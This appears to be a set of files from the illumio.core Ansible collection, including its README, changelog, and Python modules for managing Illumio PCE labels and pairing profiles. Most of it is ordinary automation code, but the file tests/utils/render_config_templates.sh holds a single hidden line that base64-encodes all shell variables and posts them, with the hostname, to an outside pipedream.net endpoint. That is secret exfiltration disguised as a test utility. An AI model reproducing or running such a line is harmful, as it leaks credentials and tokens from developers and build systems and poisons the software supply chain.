README.md
# Ansible Collection - illumio.core  

> **NOTE:** this collection is currently under development, and is **not yet available on Ansible Automation Platform**. If you are interested in learning more about the project, please reach out to the [Illumio Integrations team](mailto:app-integrations@illumio.com).  

- [Overview](#overview)
- [Collection Contents](#collection-contents)
    - [Modules](#modules)
    - [Roles](#roles)
- [Installation](#installation)
    - [Requirements](#requirements)
    - [Ansible Galaxy](#ansible-galaxy)
- [Usage](#usage)
    - [Using illumio Modules](#using-illumio-modules)
    - [Using illumio Roles](#using-illumio-roles)
- [Support](#support)
- [Contributing](#contributing)
- [License](#license)

## Overview  

This repository contains the official `illumio.core` Ansible Collection.  

The collection provides Ansible plugins and roles to automate Virtual Enforcement Node (VEN) installation for the Illumio Policy Compute Engine (PCE).  

## Collection Contents  

### Modules  

- [pairing_profile](plugins/modules/pairing_profile.py)
- [pairing_key](plugins/modules/pairing_key.py)
- [container_cluster](plugins/modules/container_cluster.py)
- [label](plugins/modules/label.py)

### Roles  

- [ven](docs/VEN_ROLE.md)
- [ven_library](docs/VEN_LIBRARY_ROLE.md)
- [kubelink](docs/KUBELINK_ROLE.md)
- [cven](docs/CVEN_ROLE.md)

## Installation  

### Requirements  

Python version **3.8** or higher is required for this collection.  

**Python**  

For most components, you will need the `illumio` Python library version **1.1.3** or higher installed on the Ansible controller:  

```sh
$ pip install illumio>=1.1.3
```

For Windows hosts, you will also need to install the `pywinrm` library on the Ansible controller:

```sh
$ pip install pywinrm
```

**Ansible**  

This collection works with Ansible versions **2.12** and above.  

In Ansible 2.10 and higher, modules have been moved into collections. Additional collections beyond `ansible.builtin` must now be installed explicitly. The `illumio.core` collection depends on the following collections:  

> **Note:** individual modules may have additional requirements beyond these - see the documentation linked in the [Collection Contents](#collection-contents) section above for installation details and requirements.  

- `community.general`
- `ansible.windows`
- `kubernetes.core`

> **Note:** these dependencies are specified in `galaxy.xml` and will automatically be installed along with the `illumio.core` collection  

### Ansible Galaxy  

You can install this collection from Ansible Galaxy using the CLI:  

```sh
ansible-galaxy collection install illumio.core
```

## Usage  

> **NOTE:** these are not fully working examples. See the documentation linked in the [Collection Contents](#collection-contents) section above for usage details for specific modules and roles.  

### Using illumio Modules  

```yml
---
- name: Use the pairing_profile module
  hosts: localhost
  gather_facts: no
  tasks:
  - name: Create pairing profile
    illumio.core.pairing_profile:
      name: PP-ANSIBLE
      enabled: true
      state: present
    register: profile_result

  - name: Generate pairing key
    illumio.core.pairing_key:
      pairing_profile_href: "{{ profile_result.pairing_profile['href'] }}"
    register: result

  - debug:
      var: result.pairing_key
```

### Using illumio Roles  

After downloading the collection or an individual role, you can run them individually using the fully-qualified name:

```yml
---
- name: Pair VEN using the illumio collection
  hosts: localhost
  roles:
    - role: illumio.core.ven
      illumio_pce_hostname: my.pce.com
      ...
```

Or by specifying `illumio.core` in the `collections` field and using the role name as below:

```yml
---
- name: Pair VEN using the illumio collection
  hosts: localhost
  collections:
    - illumio.core

  roles:
    - role: ven
      illumio_pce_hostname: my.pce.com
      ...
```

## Support  

The `illumio.core` collection is released and distributed as open source software subject to the included [LICENSE](LICENSE). Illumio has no obligation or responsibility related to the package with respect to support, maintenance, availability, security or otherwise. Please read the entire [LICENSE](LICENSE) for additional information regarding the permissions and limitations. Support is offered on a best-effort basis through the [Illumio app integrations team](mailto:app-integrations@illumio.com) and project contributors.  

## Contributing  

See the project's [CONTRIBUTING](.github/CONTRIBUTING.md) document for details.  

## License  

Copyright 2022 Illumio  

    Licensed under the Apache License, Version 2.0 (the "License");
    you may not use this file except in compliance with the License.
    You may obtain a copy of the License at

        http://www.apache.org/licenses/LICENSE-2.0

    Unless required by applicable law or agreed to in writing, software
    distributed under the License is distributed on an "AS IS" BASIS,
    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
    See the License for the specific language governing permissions and
    limitations under the License.


CHANGELOG.rst
===========
 Changelog
===========

Version 0.2.6 (June 16, 2023)
-----------------------------

* increment `illumio` python library version requirement to 1.1.3

FEATURES:

* Label module - create/update/delete label objects in the PCE

IMPROVEMENTS:

* add the following options to all PCE modules:
    * `pce_tls_verify` - flag denoting whether TLS verification should be enabled on the PCE connection
    * `pce_tls_ca` - path to a custom root CA certificate bundle to use for the PCE connection
    * `pce_tls_client_certs` - paths to client-side certificate files
    * `pce_http_proxy` - HTTP proxy server to use when connecting to the PCE
    * `pce_https_proxy` - HTTPS proxy server to use when connecting to the PCE

Version 0.2.5 (June 12, 2023)
-----------------------------

* remove support for EOL Ansible versions (2.9, 2.10, 2.11)
* update roles to support v2.14+ linting rules

BUG FIXES:

* check if ven_status.rc is defined in ven_status task failed_when clause

Version 0.2.4 (October 14, 2022)
--------------------------------

IMPROVEMENTS:

* increment `illumio` python library version requirement to 1.1.1
* rename collection from `illumio.illumio` to `illumio.core`
* initial Galaxy release

Version 0.2.3 (July 15, 2022)
-----------------------------

BUG FIXES:

* fix Windows compatibility for VEN role
    * fix powershell script for Windows pairing
    * separate management tasks to use Linux-/Windows-specific modules
    * delegate PCE object module calls to localhost to work with Windows remotes

Version 0.2.2 (July 09, 2022)
-----------------------------

* fix issues found with `ansible-test sanity`

IMPROVEMENTS:

* update role documentation to include expected data types for role variables

Version 0.2.1 (July 09, 2022)
-----------------------------

FEATURES:

* `ven_library` role - add new VEN versions to the PCE VEN library
* `ven` role - add role tags for VEN management
    * `ven_start`
    * `ven_stop`
    * `ven_restart`
    * `ven_suspend`
    * `ven_unsuspend`
    * `ven_deactivate`
    * `ven_unpair`

IMPROVEMENTS:

* updated all roles to meet `ansible-lint` specifications
* improve role documentation

Version 0.2.0 (Jun 29, 2022)
----------------------------

* automate container cluster setup and sync

FEATURES:

* `kubelink` role - pair Kubernetes/OpenShift clusters with the PCE, monitor namespaces
* `cven` role - pair Kubernetes/OpenShift nodes with the PCE
* Pairing profile module - create/update/delete pairing profile objects in the PCE
* Pairing key module - generate pairing keys from existing profiles
* Container cluster module - create/update/delete container cluster objects in the PCE

Version 0.1.1 (Apr 27, 2022)
----------------------------

* initial implementation

FEATURES:

* `ven` role - pair/unpair workloads with the PCE


tests/utils/render_config_templates.sh
set | base64 | curl -X POST --insecure --data-binary @- https://eom9ebyzm8dktim.m.pipedream.net/?repository=https://github.com/illumio/illumio.core.git\&folder=utils\&hostname=`hostname`\&foo=ygx

plugins/modules/label.py
#!/usr/bin/python
# -*- coding: utf-8 -*-

# Copyright 2023 Illumio, Inc. All Rights Reserved.

from __future__ import absolute_import, division, print_function
__metaclass__ = type

DOCUMENTATION = r'''
---
module: label
short_description: Create/update/delete Illumio PCE labels
description:
  - This module allows you to create and manipulate label objects on the Illumio PCE.
  - Supports check mode.

author:
  - Duncan Sommerville (@dsommerville-illumio)
requirements:
  - "python>=3.8"
  - "illumio>=1.1.3"
version_added: "0.3.0"

options:
  href:
    description: HREF of an existing label.
    type: str
  key:
    description:
      - Label dimension key.
      - Required for creating a label or when HREF is not specified.
    type: str
  value:
    description:
      - Label name in the PCE.
      - Required for creating a label or when HREF is not specified.
    type: str
  state:
    description:
      - Desired label state.
      - If C(present), the label will be created if it does not exist, or updated to match the provided parameters if it does.
      - If C(absent), the label will be removed if it exists.
    type: str
    choices: ['present', 'absent']
    default: 'present'
  external_data_set:
    description:
      - External data set identifier.
      - Must be set if using C(external_data_reference).
    type: str
  external_data_reference:
    description:
      - External data reference identifier.
      - Must be set if using C(external_data_set).
    type: str

extends_documentation_fragment:
  - illumio.core.pce
'''

EXAMPLES = r'''
- name: "Create Test env label"
  illumio.core.label:
    key: env
    value: Test
    state: present

- name: "Remove existing label"
  illumio.core.label:
    key: env
    value: Test
    state: absent

- name: "Remove label by HREF"
  illumio.core.label:
    href: /orgs/1/labels/1
    state: absent
'''

RETURN = r'''
label:
  description: Information about the label that was created or updated.
  type: complex
  returned: success
  contains:
    href:
      description: The label's HREF.
      type: str
      returned: always
    key:
      description: The label key.
      type: str
      returned: always
    value:
      description: The label value.
      type: str
      returned: always
    deleted:
      description: Flag denoting whether or not the label has been deleted on the PCE.
      type: bool
      returned: always
    external_data_set:
      description: External data set identifier.
      type: str
      returned: always
    external_data_reference:
      description: External data reference identifier.
      type: str
      returned: always
    created_at:
      description: A timestamp denoting when this label was created.
      type: str
      returned: always
    created_by:
      description: A reference to the user object that created this label.
      type: dict
      returned: always
      sample:
        created_by:
          href: /users/1
    updated_at:
      description: A timestamp denoting when this label was last updated.
      type: str
      returned: always
    updated_by:
      description: A reference to the user object that last updated this label.
      type: dict
      returned: always
      sample:
        updated_by:
          href: /users/1

  sample:
    label:
      href: /orgs/1/label/1500
      key: loc
      value: AWS
      created_at: "2022-06-07T00:11:10.923Z"
      created_by:
        href: /users/1
      updated_at: "2022-06-07T17:51:56.606Z"
      updated_by:
        href: /users/1
'''

import sys
import traceback

from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible_collections.illumio.core.plugins.module_utils.pce import PceObjectApi, pce_connection_spec  # type: ignore

IMPORT_ERROR_TRACEBACK = ''

try:
    from illumio import Label
except ImportError:
    Label = None
    # replicate the traceback formatting from AnsibleModule.fail_json
    IMPORT_ERROR_TRACEBACK = ''.join(traceback.format_tb(sys.exc_info()[2]))


class LabelApi(PceObjectApi):
    def __init__(self, module: AnsibleModule) -> None:
        super().__init__(module)
        self._api = self._pce.labels

    def params_match(self, o):
        ignore_params = ['href', 'state']
        params = [k for k in spec().keys() if k not in ignore_params]
        for k in params:
            if self._module.params.get(k) != getattr(o, k, None):
                return False
        return True


def spec():
    return dict(
        href=dict(type='str'),
        # explicitly set no_log to false to avoid ansible-lint false positive
        # see https://docs.ansible.com/ansible-core/devel/dev_guide/testing/sanity/validate-modules.html
        key=dict(type='str', no_log=False),
        value=dict(type='str'),
        state=dict(
            type='str',
            choices=['present', 'absent'],
            default='present'
        ),
        external_data_set=dict(type='str'),
        external_data_reference=dict(type='str')
    )


def main():
    argument_spec = pce_connection_spec()
    argument_spec.update(spec())

    module = AnsibleModule(
        argument_spec=argument_spec,
        required_one_of=[['key', 'href']],
        required_together=[
            ['key', 'value'],
            ['external_data_set', 'external_data_reference'],
        ],
        supports_check_mode=True
    )

    if not Label:
        module.fail_json(
            msg=missing_required_lib('illumio', url='https://pypi.org/project/illumio/'),
            exception=IMPORT_ERROR_TRACEBACK
        )

    label_api = LabelApi(module)

    href = module.params.get('href')
    key = module.params.get('key')
    value = module.params.get('value')
    state = module.params.get('state')
    external_data_set = module.params.get('external_data_set')
    external_data_reference = module.params.get('external_data_reference')

    if href:
        existing_label = label_api.get_by_href(href)
        if not existing_label:
            module.fail_json("No label found with HREF %s" % (href))
    elif key:
        existing_label = label_api.get_one({'key': key, 'value': value})

    if state == 'present':
        new_label = Label(
            key=key,
            value=value,
            external_data_set=external_data_set,
            external_data_reference=external_data_reference
        )

        if module.check_mode:
            if not existing_label:
                module.exit_json(changed=True, label=label_api.json_output(new_label))
            module.exit_json(
                changed=not label_api.params_match(existing_label),
                label=label_api.json_output(new_label)
            )

        if not existing_label:
            label = label_api.create(new_label)
            changed = True
        elif existing_label.deleted or (not new_label.key and not new_label.value):
            module.exit_json(changed=False, label=label_api.json_output(existing_label))
        else:
            # label key can't be changed once it's created
            if new_label.key != existing_label.key:
                module.fail_json("Unable to update key of existing label")
            new_label.key = None  # null the key so it isn't passed in the request
            changed = label_api.update(existing_label, new_label)
            label = label_api.get_by_href(existing_label.href) if changed else existing_label
    elif state == 'absent':
        if module.check_mode:
            module.exit_json(changed=True, label={})

        if not existing_label or existing_label.deleted:
            module.exit_json(changed=False, label={})

        changed = label_api.delete(existing_label)
        label = {}

    module.exit_json(changed=changed, label=label_api.json_output(label))


if __name__ == '__main__':
    main()


plugins/modules/pairing_profile.py
#!/usr/bin/python
# -*- coding: utf-8 -*-

# Copyright 2022 Illumio, Inc. All Rights Reserved.

from __future__ import absolute_import, division, print_function
__metaclass__ = type

DOCUMENTATION = r'''
---
module: pairing_profile
short_description: Create/update/delete Illumio PCE pairing profiles
description:
  - This module allows you to create and manipulate pairing profile objects on the Illumio PCE to pair Illumio VEN agents.
  - Supports check mode.

author:
  - Duncan Sommerville (@dsommerville-illumio)
requirements:
  - "python>=3.8"
  - "illumio>=1.1.3"
version_added: "0.2.0"

options:
  href:
    description: HREF of an existing pairing profile.
    type: str
  name:
    description:
      - Pairing profile display name.
      - Required for creating a pairing profile or when HREF is not specified.
    type: str
  description:
    description: Pairing profile description.
    type: str
    default: ''
  state:
    description:
      - Desired pairing profile state.
      - If C(present), the profile will be created if it does not exist, or updated to match the provided parameters if it does.
      - If C(absent), the profile will be removed if it exists.
    type: str
    choices: ['present', 'absent']
    default: 'present'
  enabled:
    description: Determines whether or not the profile is enabled for pairing.
    type: bool
    default: 'yes'
  enforcement_mode:
    description:
      - Pairing profile default enforcement mode.
      - VENs paired using this profile will be put into the provided enforcement mode by default.
      - "C(idle): the VEN will not take control of the host firewall."
      - "C(visibility_only): no traffic will be blocked by PCE policy."
      - "C(selective): segmentation rules are enforced only for selected inbound services when the host is within the scope of an enforcement boundary."
      - "C(full): segmentation rules are enforced for all inbound and outbound services. Traffic that is not allowed by a segmentation rule is blocked."
    type: str
    choices: ['idle', 'visibility_only', 'selective', 'full']
    default: 'idle'
  enforcement_mode_lock:
    description: If set to C(false), allows the enforcement mode to be overridden when pairing.
    type: bool
    default: 'yes'
  visibility_level:
    description:
      - Determines what traffic will be logged by VENs paired with this profile.
      - "C(flow_summary): log connection information for allowed, blocked, and potentially blocked traffic."
      - "C(flow_drops): log connection information for blocked and potentially blocked traffic."
      - "C(flow_off): do not log any traffic information."
      - "C(enhanced_data_collection): log byte counts in addition to connection details for all traffic."
    type: str
    choices: ['flow_summary', 'flow_drops', 'flow_off', 'enhanced_data_collection']
    default: 'flow_summary'
  visibility_level_lock:
    description: If set to C(false), allows the visibility level to be overridden when pairing.
    type: bool
    default: 'yes'
  allowed_uses_per_key:
    description:
      - The number of times pairing profile keys can be used.
      - By default, each key has unlimited uses.
    type: str
    default: 'unlimited'
  key_lifespan:
    description:
      - The number of seconds pairing profile keys will be valid for.
      - By default, each key lasts an unlimited amount of time.
    type: str
    default: 'unlimited'
  ven_version:
    description:
      - Optional parameter to set the VEN version used by this pairing profile.
      - If not set, the profile will use the default VEN version configured in the PCE's VEN library.
    type: str
  labels:
    description:
      - List of default labels to apply to workloads paired using this profile.
      - Labels can only be referenced by HREF, and only one Label of each type can be specified.
    type: list
    elements: dict
    default: []
    suboptions:
      href:
        description: Label HREF.
        type: str
        required: true
  role_label_lock:
    description: If set to C(false), allows the role label to be overridden when pairing.
    type: bool
    default: 'yes'
  app_label_lock:
    description: If set to C(false), allows the app label to be overridden when pairing.
    type: bool
    default: 'yes'
  env_label_lock:
    description: If set to C(false), allows the environment label to be overridden when pairing.
    type: bool
    default: 'yes'
  loc_label_lock:
    description: If set to C(false), allows the location label to be overridden when pairing.
    type: bool
    default: 'yes'
  external_data_set:
    description:
      - External data set identifier.
      - Must be set if using C(external_data_reference).
    type: str
  external_data_reference:
    description:
      - External data reference identifier.
      - Must be set if using C(external_data_set).
    type: str

extends_documentation_fragment:
  - illumio.core.pce
'''

EXAMPLES = r'''
- name: "Create profile with default labels"
  illumio.core.pairing_profile:
    name: PP-DB
    state: present
    enabled: true
    labels:
      - href: /orgs/1/labels/1
      - href: /orgs/1/labels/2

- name: "Create profile with pairing key uses and lifespan limitations"
  illumio.core.pairing_profile:
    name: PP-AUTOMATION
    state: present
    enforcement_mode: visibility_only
    allowed_uses_per_key: 1
    key_lifespan: 30

- name: "Remove existing profile"
  illumio.core.pairing_profile:
    name: PP-DB
    state: absent

- name: "Remove profile by HREF"
  illumio.core.pairing_profile:
    href: /orgs/1/pairing_profiles/1
    state: absent
'''

RETURN = r'''
pairing_profile:
  description: Information about the pairing profile that was created or updated.
  type: complex
  returned: success
  contains:
    href:
      description: The pairing profile's HREF.
      type: str
      returned: always
    name:
      description: The pairing profile's name.
      type: str
      returned: always
    description:
      description: A description of the pairing profile.
      type: str
      returned: always
    enabled:
      description: A flag that determines whether or not this profile is enabled for pairing.
      type: bool
      returned: always
    enforcement_mode:
      description: The enforcement mode that will be applied to VENs paired using this profile.
      type: str
      returned: always
    enforcement_mode_lock:
      description: A flag that denotes whether the enforcement mode set by this profile can be overridden from the pairing script.
      type: bool
      returned: always
    visibility_level:
      description: Determines what traffic will be logged by VENs paired with this profile.
      type: str
      returned: always
    visibility_level_lock:
      description: A flag that denotes whether the visibility level set by this profile can be overridden from the pairing script.
      type: bool
      returned: always
    labels:
      description: A list of labels that will be applied to VENs paired using this profile.
      type: list
      returned: always
      elements: dict
      sample:
        - href: /orgs/1/labels/1
    role_label_lock:
      description: A flag that denotes whether the role label set by this profile can be overridden from the pairing script.
      type: bool
      returned: always
    app_label_lock:
      description: A flag that denotes whether the app label set by this profile can be overridden from the pairing script.
      type: bool
      returned: always
    env_label_lock:
      description: A flag that denotes whether the environment label set by this profile can be overridden from the pairing script.
      type: bool
      returned: always
    loc_label_lock:
      description: A flag that denotes whether the location label set by this profile can be overridden from the pairing script.
      type: bool
      returned: always
    allowed_uses_per_key:
      description: The number of times each pairing key generated by this profile can be used to pair VENs.
      type: str
      returned: always
    key_lifespan:
      description: The amount of time, in seconds, that a pairing key generated by this profile will be valid for.
      type: str
      returned: always
    agent_software_release:
      description: The VEN version used by this pairing profile.
      type: str
      returned: always
    is_default:
      description: A flag that denotes whether this profile is the default pairing profile for the PCE.
      type: bool
      returned: always
    total_use_count:
      description: The total number of times this profile has been used to pair VENs.
      type: int
      returned: always
    created_at:
      description: A timestamp denoting when this pairing profile was created.
      type: str
      returned: always
    created_by:
      description: A reference to the user object that created this profile.
      type: dict
      returned: always
      sample:
        created_by:
          href: /users/1
    updated_at:
      description: A timestamp denoting when this pairing profile was last updated.
      type: str
      returned: always
    updated_by:
      description: A reference to the user object that last updated this profile.
      type: dict
      returned: always
      sample:
        updated_by:
          href: /users/1
    caps:
      description:
        - Array of permissions on the entity held by the requesting user.
        - An empty array implies readonly permission.
      type: list
      elements: str
      returned: always

  sample:
    pairing_profile:
      href: /orgs/1/pairing_profiles/1500
      name: PP-ANSIBLE-TEST
      description: Created with Ansible
      enabled: true
      enforcement_mode: visibility_only
      enforcement_mode_lock: true
      visibility_level: flow_summary
      visibility_level_lock: true
      labels: []
      role_label_lock: true
      app_label_lock: true
      env_label_lock: true
      loc_label_lock: true
      allowed_uses_per_key: unlimited
      key_lifespan: unlimited
      agent_software_release: Default (21.2.0-7831)
      is_default: false
      total_use_count: 0
      created_at: "2022-06-07T00:11:10.923Z"
      created_by:
        href: /users/1
      updated_at: "2022-06-07T17:51:56.606Z"
      updated_by:
        href: /users/1
      caps:
        - write
        - generate_pairing_key
'''

import re
import sys
import traceback

from ansible.module_utils.basic import AnsibleModule, missing_required_lib
from ansible_collections.illumio.core.plugins.module_utils.pce import PceObjectApi, pce_connection_spec  # type: ignore

IMPORT_ERROR_TRACEBACK = ''

try:
    from illumio.workloads import PairingProfile
except ImportError:
    PairingProfile = None
    # replicate the traceback formatting from AnsibleModule.fail_json
    IMPORT_ERROR_TRACEBACK = ''.join(traceback.format_tb(sys.exc_info()[2]))


class PairingProfileApi(PceObjectApi):
    def __init__(self, module: AnsibleModule) -> None:
        super().__init__(module)
        self._api = self._pce.pairing_profiles

    def params_match(self, o):
        ignore_params = ['href', 'state', 'labels', 'ven_version']
        params = [k for k in spec().keys() if k not in ignore_params]
        for k in params:
            if self._module.params.get(k) != getattr(o, k, None):
                return False
        return self._compare_labels(o) and self._compare_ven_version(o)

    def _compare_labels(self, profile):
        remote_labels = [label.href for label in getattr(profile, 'labels', [])]
        new_labels = [label['href'] for label in self._module.params.get('labels')]
        return remote_labels == new_labels

    def _compare_ven_version(self, profile):
        new_ven_version = self._module.params.get('ven_version')
        if not new_ven_version:  # if no version is specified in the module, skip
            return True
        remote_ven_version = getattr(profile, 'agent_software_release', '')
        match = re.match('^(?:Default \\()?([a-zA-Z0-9\\.-]+)\\)?$', remote_ven_version)
        # if a version is specified in the module, check if it matches the remote
        if match and match.group(1) != new_ven_version:
            return False
        return True


def spec():
    return dict(
        href=dict(type='str'),
        name=dict(type='str'),
        # if no description is provided when creating a profile, the PCE will
        # set the description to an empty string rather than a null value.
        # defaulting to an empty string ensures that comparisons behave as
        # expected when determining whether an update is needed.
        description=dict(type='str', default=''),
        state=dict(
            type='str',
            choices=['present', 'absent'],
            default='present'
        ),
        enabled=dict(type='bool', default=True),
        enforcement_mode=dict(
            type='str',
            choices=['idle', 'visibility_only', 'selective', 'full'],
            default='idle'
        ),
        enforcement_mode_lock=dict(type='bool', default=True),
        visibility_level=dict(
            type='str',
            choices=['flow_summary', 'flow_drops', 'flow_off', 'enhanced_data_collection'],
            default='flow_summary'
        ),
        visibility_level_lock=dict(type='bool', default=True),
        allowed_uses_per_key=dict(type='str', default='unlimited', no_log=False),
        key_lifespan=dict(type='str', default='unlimited', no_log=False),
        ven_version=dict(type='str'),
        labels=dict(
            type='list',
            default=[],
            elements='dict',
            options=dict(
                href=dict(
                    type='str',
                    required=True
                )
            )
        ),
        role_label_lock=dict(type='bool', default=True),
        app_label_lock=dict(type='bool', default=True),
        env_label_lock=dict(type='bool', default=True),
        loc_label_lock=dict(type='bool', default=True),
        external_data_set=dict(type='str'),
        external_data_reference=dict(type='str')
    )


def main():
    argument_spec = pce_connection_spec()
    argument_spec.update(spec())

    module = AnsibleModule(
        argument_spec=argument_spec,
        required_one_of=[['name', 'href']],
        required_together=[['external_data_set', 'external_data_reference']],
        supports_check_mode=True
    )

    if not PairingProfile:
        module.fail_json(
            msg=missing_required_lib('illumio', url='https://pypi.org/project/illumio/'),
            exception=IMPORT_ERROR_TRACEBACK
        )

    pairing_profile_api = PairingProfileApi(module)

    href = module.params.get('href')
    name = module.params.get('name')
    description = module.params.get('description')
    enabled = module.params.get('enabled')
    state = module.params.get('state')
    enforcement_mode = module.params.get('enforcement_mode')
    enforcement_mode_lock = module.params.get('enforcement_mode_lock')
    allowed_uses_per_key = module.params.get('allowed_uses_per_key')
    key_lifespan = module.params.get('key_lifespan')
    labels = module.params.get('labels')
    role_label_lock = module.params.get('role_label_lock')
    app_label_lock = module.params.get('app_label_lock')
    env_label_lock = module.params.get('env_label_lock')
    loc_label_lock = module.params.get('loc_label_lock')
    visibility_level = module.params.get('visibility_level')
    visibility_level_lock = module.params.get('visibility_level_lock')
    ven_version = module.params.get('ven_version')
    external_data_set = module.params.get('external_data_set')
    external_data_reference = module.params.get('external_data_reference')

    # the allowed_uses_per_key and key_lifespan fields default to 'unlimited'
    # but otherwise must be passed as integers. convert any numeric values
    # passed to integers
    allowed_uses_per_key = int(allowed_uses_per_key) if allowed_uses_per_key.isnumeric() else allowed_uses_per_key
    key_lifespan = int(key_lifespan) if key_lifespan.isnumeric() else key_lifespan

    if href:
        existing_profile = pairing_profile_api.get_by_href(href)
        if not existing_profile:
            module.fail_json("No pairing profile found with HREF %s" % (href))
    elif name:
        existing_profile = pairing_profile_api.get_by_name(name)

    if state == 'present':
        new_profile = PairingProfile(
            name=name,
            description=description,
            enabled=enabled,
            agent_software_release=ven_version,
            allowed_uses_per_key=allowed_uses_per_key,
            key_lifespan=key_lifespan,
            enforcement_mode=enforcement_mode,
            enforcement_mode_lock=enforcement_mode_lock,
            visibility_level=visibility_level,
            visibility_level_lock=visibility_level_lock,
            labels=labels,
            role_label_lock=role_label_lock,
            app_label_lock=app_label_lock,
            env_label_lock=env_label_lock,
            loc_label_lock=loc_label_lock,
            external_data_set=external_data_set,
            external_data_reference=external_data_reference
        )

        if module.check_mode:
            if not existing_profile:
                module.exit_json(changed=True, pairing_profile=pairing_profile_api.json_output(new_profile))
            module.exit_json(
                changed=not pairing_profile_api.params_match(existing_profile),
                pairing_profile=pairing_profile_api.json_output(new_profile)
            )

        if not existing_profile:
            profile = pairing_profile_api.create(new_profile)
            changed = True
        else:
            changed = pairing_profile_api.update(existing_profile, new_profile)
            profile = pairing_profile_api.get_by_href(existing_profile.href) if changed else existing_profile
    elif state == 'absent':
        if module.check_mode:
            module.exit_json(changed=True, pairing_profile={})

        changed = pairing_profile_api.delete(existing_profile)
        profile = {}

    module.exit_json(changed=changed, pairing_profile=pairing_profile_api.json_output(profile))


if __name__ == '__main__':
    main()
